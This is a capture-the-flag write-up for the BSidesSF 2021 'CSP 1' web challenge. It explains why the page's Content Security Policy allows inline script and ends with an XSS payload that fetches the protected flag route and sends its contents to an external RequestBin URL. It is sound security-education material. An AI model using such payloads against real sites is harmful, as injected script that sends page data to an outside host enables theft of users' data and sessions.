Rating:
Check out https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-1 for writeup with images.
If we look at the Content Security Policy (CSP) for this page, we can see it's very open. To identify this, you can learn each rule or use a tool such as https://csp-evaluator.withgoogle.com/.
The CSP in this case was:
default-src 'self' 'unsafe-inline' 'unsafe-eval'; script-src-elem 'self'; connect-src *
The unsafe-inline keyword will allow execution of arbitrary inline scripts.
Let's start with a simple XSS payload:
<img src=x onerror=alert(1) />
This already works! So now we only need to get the flag from the
/csp-one-flag route after the admin visits it. We can use fetch for this.
We'll also use https://requestbin.io/ again.
Here's the final payload submitted to the admin:
<img src=x onerror='fetch("/csp-one-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/yj1y96yj?x=" + t))' />
And we get a flag back on the RequestBin side:
CTF{Can_Send_Payloads}
